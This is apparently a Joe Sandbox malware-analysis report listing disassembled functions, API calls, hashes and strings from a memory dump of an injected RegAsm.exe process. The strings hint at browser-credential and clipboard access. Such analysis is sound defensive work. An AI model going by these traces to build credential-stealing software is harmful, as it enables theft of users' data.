                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                          APIs
                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: EnumNamesResource
                                                          • String ID:
                                                          • API String ID: 3334572018-0
                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                          APIs
                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                          APIs
                                                          • memset.MSVCRT ref: 004095FC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3655998216-0
                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                          • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                          • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                          • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                          APIs
                                                          • memset.MSVCRT ref: 00445426
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                          • String ID:
                                                          • API String ID: 1828521557-0
                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                          APIs
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                          • memcpy.MSVCRT ref: 00406942
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@FilePointermemcpy
                                                          • String ID:
                                                          • API String ID: 609303285-0
                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID:
                                                          • API String ID: 2081463915-0
                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                          APIs
                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                          • String ID:
                                                          • API String ID: 2136311172-0
                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                          APIs
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@
                                                          • String ID:
                                                          • API String ID: 1936579350-0
                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                          • GetLastError.KERNEL32 ref: 00409974
                                                          • CloseClipboard.USER32 ref: 0040997D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                          • String ID:
                                                          • API String ID: 2565263379-0
                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 00409882
                                                          • wcslen.MSVCRT ref: 0040988F
                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                          • memcpy.MSVCRT ref: 004098B5
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                          • CloseClipboard.USER32 ref: 004098D7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                          • String ID:
                                                          • API String ID: 2014503067-0
                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                          • String ID: OsError 0x%x (%u)
                                                          • API String ID: 403622227-2664311388
                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                          APIs
                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • memset.MSVCRT ref: 0040265F
                                                          • memcpy.MSVCRT ref: 0040269B
                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          • memcpy.MSVCRT ref: 004026FF
                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                          • API String ID: 577499730-1134094380
                                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                          • String ID: :stringdata$ftp://$http://$https://
                                                          • API String ID: 2787044678-1921111777
                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                          • GetDC.USER32 ref: 004140E3
                                                          • wcslen.MSVCRT ref: 00414123
                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                          • _snwprintf.MSVCRT ref: 00414244
                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                          • String ID: %s:$EDIT$STATIC
                                                          • API String ID: 2080319088-3046471546
                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                          • memset.MSVCRT ref: 00413292
                                                          • memset.MSVCRT ref: 004132B4
                                                          • memset.MSVCRT ref: 004132CD
                                                          • memset.MSVCRT ref: 004132E1
                                                          • memset.MSVCRT ref: 004132FB
                                                          • memset.MSVCRT ref: 00413310
                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                          • memset.MSVCRT ref: 004133C0
                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                          • memcpy.MSVCRT ref: 004133FC
                                                          • wcscpy.MSVCRT ref: 0041341F
                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                          Strings
                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                          • {Unknown}, xrefs: 004132A6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
